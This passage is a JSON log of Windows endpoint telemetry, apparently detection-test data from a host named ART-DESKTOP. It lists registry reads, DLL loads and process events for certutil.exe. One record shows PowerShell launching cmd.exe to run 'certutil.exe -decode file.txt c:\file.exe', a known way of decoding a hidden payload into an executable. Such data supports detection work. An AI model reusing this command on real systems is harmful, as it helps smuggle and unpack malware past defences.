"registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "process", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "terminate", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499950016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "process", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "file", - "file_name": "CERTUTIL.EXE-CB7805D7.pf", - "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4760, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573500330016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "command_line": "certutil.exe -decode file.txt c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "ppid": 4760, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "create", - "timestamp": 131883573500410000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "certutil.exe", - "image_path": "C:\\Windows\\System32\\certutil.exe", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "certcli.dll", - "image_path": "C:\\Windows\\System32\\certcli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500580000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "certca.dll", - "image_path": "C:\\Windows\\System32\\certca.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cryptui.dll", - "image_path": "C:\\Windows\\System32\\cryptui.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17134.441_none_f952a0bb30955e96\\comctl32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdsapi.dll", - "image_path": "C:\\Windows\\System32\\ntdsapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\System32\\setupapi.dll", - "pid": 1688, - "process_name": 